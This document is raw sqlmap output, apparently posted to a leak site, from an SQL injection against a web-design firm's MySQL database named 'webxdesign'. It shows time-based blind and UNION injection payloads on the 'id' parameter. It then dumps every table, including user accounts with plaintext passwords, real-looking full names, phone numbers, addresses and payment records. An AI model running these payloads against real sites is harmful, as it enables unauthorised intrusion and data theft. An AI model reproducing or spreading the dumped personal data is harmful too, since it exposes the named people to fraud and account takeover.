___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.7.4#dev}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable lo
any misuse or damage caused by this program

[*] starting at 23:02:47

[23:02:48] [INFO] fetched random HTTP User-Agent header value 'Opera/9.61 (Windows NT 6.0; U; http://lucideer.com; en-GB) Presto/2.1.1' from file 'C:\Python27\sql
[23:02:49] [INFO] resuming back-end DBMS 'mysql'
[23:02:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=3' AND SLEEP(5) AND 'jBOM'='jBOM

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-3325' UNION ALL SELECT NULL,NULL,CONCAT(0x71626a6b71,0x4148446a65584e704e4e6c4a4a49794d675469786b484b6b7a545045794e664b6949724674754d6f,0x71716b7
---
[23:02:51] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[23:02:51] [INFO] fetching tables for database: 'webxdesign'
[23:02:51] [INFO] used SQL query returns 6 entries
[23:02:51] [INFO] starting 6 threads
[23:02:51] [INFO] resumed: packages
[23:02:51] [INFO] resumed: payments
[23:02:51] [INFO] resumed: pics
[23:02:51] [INFO] resumed: users
[23:02:51] [INFO] resumed: products
[23:02:51] [INFO] resumed: remarks
[23:02:51] [INFO] fetching columns for table 'users' in database 'webxdesign'
[23:02:51] [INFO] used SQL query returns 11 entries
[23:02:51] [INFO] starting 10 threads
[23:02:51] [INFO] resumed: "UserId","int(5)"
[23:02:51] [INFO] resumed: "FullName","varchar(100)"
[23:02:51] [INFO] resumed: "Email","varchar(30)"
[23:02:51] [INFO] resumed: "Address","varchar(100)"
[23:02:51] [INFO] resumed: "TelephoneNo","varchar(15)"
[23:02:51] [INFO] resumed: "Password","varchar(15)"
[23:02:51] [INFO] resumed: "CompanyName","varchar(30)"
[23:02:51] [INFO] resumed: "StatusRegister","varchar(10)"
[23:02:51] [INFO] resumed: "RO","varchar(30)"
[23:02:51] [INFO] resumed: "DateRegister","timestamp"
[23:02:51] [INFO] resumed: "Level","varchar(2)"
[23:02:52] [INFO] fetching entries for table 'users' in database 'webxdesign'
[23:02:52] [INFO] used SQL query returns 4 entries
[23:02:52] [INFO] starting 4 threads
[23:02:52] [INFO] resumed: "","","2018-02-28 02:34:06","webxdesign","","webx2...
[23:02:52] [INFO] resumed: "Kota Tinggi, Johor,","MIRAGE SDN BHD","2018-05-13...
[23:02:52] [INFO] resumed: "","","2018-05-16 04:24:50","","","webx2018","","O...
[23:02:52] [INFO] resumed: "","azmien","2018-05-16 04:31:02","[email protected]
Database: webxdesign
Table: users
[4 entries]
+--------+---------+---------------------------+---------+---------------------+---------------+----------+-------------+----------------+---------------------+--
| UserId | RO      | Email                     | Level   | Address             | FullName      | Password | TelephoneNo | CompanyName    | DateRegister        | S
+--------+---------+---------------------------+---------+---------------------+---------------+----------+-------------+----------------+---------------------+--
| 1      | <blank> | webxdesign                | 1       | <blank>             | <blank>       | webx2018 | <blank>     | <blank>        | 2018-02-28 02:34:06 | <
| 9      | <blank> | [email protected] | 2       | Kota Tinggi, Johor, | RAFIDAH SABRO | webx2018 | 01140436315 | MIRAGE SDN BHD | 2018-05-13 12:21:27 | O
| 10     | <blank> | <blank>                   | 2       | <blank>             | <blank>       | webx2018 | <blank>     | <blank>        | 2018-05-16 04:24:50 | O
| 13     | <blank> | [email protected]          | 2       | <blank>             | azmien        | webx2018 | 0191233445  | azmien         | 2018-05-16 04:31:02 | O
+--------+---------+---------------------------+---------+---------------------+---------------+----------+-------------+----------------+---------------------+--

[23:02:52] [INFO] fetching columns for table 'pics' in database 'webxdesign'
[23:02:52] [INFO] used SQL query returns 4 entries
[23:02:52] [INFO] starting 4 threads
[23:02:52] [INFO] resumed: "PicId","int(11)"
[23:02:52] [INFO] resumed: "PicName","varchar(100)"
[23:02:52] [INFO] resumed: "PicNo","varchar(15)"
[23:02:52] [INFO] resumed: "PicEmail","varchar(100)"
[23:02:52] [INFO] fetching entries for table 'pics' in database 'webxdesign'
[23:02:52] [INFO] used SQL query returns 4 entries
[23:02:52] [INFO] starting 4 threads
[23:02:52] [INFO] resumed: "[email protected]","4","Nur Farah Hidayah ...
[23:02:52] [INFO] resumed: "[email protected]","5","Saiful Ismadi Bin Mo...
[23:02:52] [INFO] resumed: "[email protected]","6","Mohd Ikhwan Bin Magh...
[23:02:52] [INFO] resumed: "[email protected]","7","Ahmad Akbar Noor Bin ...
Database: webxdesign
Table: pics
[4 entries]
+-------+------------+----------------------------------+--------------------------+
| PicId | PicNo      | PicName                          | PicEmail                 |
+-------+------------+----------------------------------+--------------------------+
| 4     | 0183636324 | Nur Farah Hidayah Binti Jafri    | [email protected] |
| 5     | 0127754366 | Saiful Ismadi Bin Mohamed Ismail | [email protected]   |
| 6     | 0197790918 | Mohd Ikhwan Bin Maghribi         | [email protected]   |
| 7     | 0137104737 | Ahmad Akbar Noor Bin Noor Hamid  | [email protected]    |
+-------+------------+----------------------------------+--------------------------+

[23:02:52] [INFO] fetching columns for table 'products' in database 'webxdesign'
[23:02:52] [INFO] used SQL query returns 13 entries
[23:02:52] [INFO] starting 10 threads
[23:02:52] [INFO] resumed: "ProductId","int(11)"
[23:02:52] [INFO] resumed: "ProductTitle","varchar(100)"
[23:02:52] [INFO] resumed: "PackageName","varchar(50)"
[23:02:52] [INFO] resumed: "TemplateName","varchar(50)"
[23:02:52] [INFO] resumed: "PackageType","varchar(100)"
[23:02:52] [INFO] resumed: "UAT","varchar(1000)"
[23:02:52] [INFO] resumed: "API","varchar(10)"
[23:02:52] [INFO] resumed: "MonthlyFee","int(10)"
[23:02:52] [INFO] resumed: "StartDate","date"
[23:02:52] [INFO] resumed: "DepositFee","int(10)"
[23:02:52] [INFO] resumed: "UserId","int(11)"
[23:02:52] [INFO] resumed: "DueDate","date"
[23:02:52] [INFO] resumed: "ProductAddDate","timestamp"
[23:02:53] [INFO] fetching entries for table 'products' in database 'webxdesign'
[23:02:53] [INFO] used SQL query returns 3 entries
[23:02:53] [INFO] starting 3 threads
[23:02:53] [INFO] resumed: "","300","0000-00-00","100","Basic - Website Devel...
[23:02:53] [INFO] resumed: "","300","0000-00-00","100","Basic - Website Devel...
[23:02:53] [INFO] resumed: "","300","0000-00-00","100","Basic - Website Devel...
Database: webxdesign
Table: products
[3 entries]
+--------+-----------+---------+---------------------------------------+------------+------------+------------+------------+-----------------------------+--------
----------------------------+------------------+---------------------+
| UserId | ProductId | API     | UAT                                   | DueDate    | StartDate  | MonthlyFee | DepositFee | PackageName                 | Package
                            | TemplateName     | ProductAddDate      |
+--------+-----------+---------+---------------------------------------+------------+------------+------------+------------+-----------------------------+--------
----------------------------+------------------+---------------------+
| 9      | 6         | <blank> | <blank>                               | 0000-00-00 | 0000-00-00 | 100        | 300        | Basic - Website Development | Website
                            | Blossom Feminine | 2018-05-13 12:21:27 |
| 10     | 7         | <blank> | PERTEMUAN 10 PENCARIAN  LANJUTAN .pdf | 0000-00-00 | 0000-00-00 | 100        | 300        | Basic - Website Development | Website
; width: 100%; height: 100% | Elara            | 2018-06-09 08:46:58 |
| 13     | 10        | <blank> | <blank>                               | 0000-00-00 | 0000-00-00 | 100        | 300        | Basic - Website Development | Website
                            | Blue Street      | 2018-05-16 04:31:02 |
+--------+-----------+---------+---------------------------------------+------------+------------+------------+------------+-----------------------------+--------
----------------------------+------------------+---------------------+

[23:02:53] [INFO] fetching columns for table 'payments' in database 'webxdesign'
[23:02:53] [INFO] used SQL query returns 8 entries
[23:02:53] [INFO] starting 8 threads
[23:02:53] [INFO] resumed: "PaymentId","int(11)"
[23:02:53] [INFO] resumed: "PaymentFee","decimal(10,2)"
[23:02:53] [INFO] resumed: "PaymentStatus","varchar(30)"
[23:02:53] [INFO] resumed: "PaymentDate","timestamp"
[23:02:53] [INFO] resumed: "Bill_Id","varchar(10)"
[23:02:53] [INFO] resumed: "Status","varchar(5)"
[23:02:53] [INFO] resumed: "Terms","varchar(5)"
[23:02:53] [INFO] resumed: "ProductId","int(11)"
[23:02:53] [INFO] fetching entries for table 'payments' in database 'webxdesign'
[23:02:53] [INFO] used SQL query returns 4 entries
[23:02:53] [INFO] starting 4 threads
[23:02:53] [INFO] resumed: "3izoma","2018-05-13 12:23:16","318.00","8","Depos...
[23:02:53] [INFO] resumed: "","2018-05-16 04:24:50","318.00","9","Deposit","7...
[23:02:53] [INFO] resumed: "00zqgg","2018-05-16 04:31:02","318.00","12","Depo...
[23:02:53] [INFO] resumed: "0rnzxw","2018-06-09 08:57:34","106.00","22","Mont...
Database: webxdesign
Table: payments
[4 entries]
+---------+-----------+-----------+---------+--------+------------+---------------------+---------------+
| Bill_Id | PaymentId | ProductId | Terms   | Status | PaymentFee | PaymentDate         | PaymentStatus |
+---------+-----------+-----------+---------+--------+------------+---------------------+---------------+
| 3izoma  | 8         | 6         | Yes     | 2      | 318.00     | 2018-05-13 12:23:16 | Deposit       |
| <blank> | 9         | 7         | <blank> | 1      | 318.00     | 2018-05-16 04:24:50 | Deposit       |
| 00zqgg  | 12        | 10        | Yes     | 1      | 318.00     | 2018-05-16 04:31:02 | Deposit       |
| 0rnzxw  | 22        | 10        | No      | 1      | 106.00     | 2018-06-09 08:57:34 | Monthly       |
+---------+-----------+-----------+---------+--------+------------+---------------------+---------------+

[23:02:53] [INFO] fetching columns for table 'remarks' in database 'webxdesign'
[23:02:53] [INFO] used SQL query returns 9 entries
[23:02:53] [INFO] starting 9 threads
[23:02:53] [INFO] resumed: "RemarkId","int(11)"
[23:02:53] [INFO] resumed: "AttendBy","varchar(100)"
[23:02:53] [INFO] resumed: "AttendDate","date"
[23:02:53] [INFO] resumed: "AttendAction","varchar(100)"
[23:02:53] [INFO] resumed: "RequirementType","varchar(100)"
[23:02:53] [INFO] resumed: "AppointmentBy","varchar(100)"
[23:02:53] [INFO] resumed: "AppointmentDate","date"
[23:02:54] [INFO] resumed: "RemarkStatus","varchar(100)"
[23:02:54] [INFO] resumed: "PaymentId","int(11)"
[23:02:54] [INFO] fetching entries for table 'remarks' in database 'webxdesign'
[23:02:54] [INFO] used SQL query returns 3 entries
[23:02:54] [INFO] starting 3 threads
[23:02:54] [INFO] resumed: "Not Set"," ","Not Set","Not Set"," ","8","6","Not...
[23:02:54] [INFO] resumed: "Not Set"," ","Not Set","Not Set"," ","9","7","Not...
[23:02:54] [INFO] resumed: "Not Set"," ","Not Set","Not Set"," ","12","10","N...
Database: webxdesign
Table: remarks
[3 entries]
+----------+-----------+----------+------------+----------------+--------------+---------------+-----------------+-----------------+
| RemarkId | PaymentId | AttendBy | AttendDate | RemarkStatus   | AttendAction | AppointmentBy | AppointmentDate | RequirementType |
+----------+-----------+----------+------------+----------------+--------------+---------------+-----------------+-----------------+
| 6        | 8         | Not Set  | NULL       | Not Attend Yet | Not Set      | Not Set       | NULL            | Not Set         |
| 7        | 9         | Not Set  | NULL       | Not Attend Yet | Not Set      | Not Set       | NULL            | Not Set         |
| 10       | 12        | Not Set  | NULL       | Not Attend Yet | Not Set      | Not Set       | NULL            | Not Set         |
+----------+-----------+----------+------------+----------------+--------------+---------------+-----------------+-----------------+

[23:02:54] [INFO] fetching columns for table 'packages' in database 'webxdesign'
[23:02:54] [INFO] used SQL query returns 5 entries
[23:02:54] [INFO] starting 5 threads
[23:02:54] [INFO] resumed: "PackageId","int(11)"
[23:02:54] [INFO] resumed: "PackageName","varchar(100)"
[23:02:54] [INFO] resumed: "PackageType","varchar(40)"
[23:02:54] [INFO] resumed: "DepositFee","int(11)"
[23:02:54] [INFO] resumed: "MonthlyFee","int(11)"
[23:02:54] [INFO] fetching entries for table 'packages' in database 'webxdesign'
[23:02:54] [INFO] used SQL query returns 5 entries
[23:02:54] [INFO] starting 5 threads
[23:02:54] [INFO] resumed: "300","100","1","Basic - Website Development","Web...
[23:02:54] [INFO] resumed: "300","200","2","E-Commerce - Website Development"...
[23:02:54] [INFO] resumed: "300","60","3","Basic - Mobile Apps Development","...
[23:02:54] [INFO] resumed: "300","100","4","Advance - Mobile Apps Development...
[23:02:54] [INFO] resumed: "300","260","5","Professional - Mobile Apps Develo...
Database: webxdesign
Table: packages
[5 entries]
+-----------+------------+------------+----------------------------------------+-------------------------+
| PackageId | MonthlyFee | DepositFee | PackageName                            | PackageType             |
+-----------+------------+------------+----------------------------------------+-------------------------+
| 1         | 100        | 300        | Basic - Website Development            | Website Development     |
| 2         | 200        | 300        | E-Commerce - Website Development       | Website Development     |
| 3         | 60         | 300        | Basic - Mobile Apps Development        | Mobile Apps Development |
| 4         | 100        | 300        | Advance - Mobile Apps Development      | Mobile Apps Development |
| 5         | 260        | 300        | Professional - Mobile Apps Development | Mobile Apps Development |
+-----------+------------+------------+----------------------------------------+-------------------------+
[*] shutting down at 23:02:54


# siph0n [2018-07-12]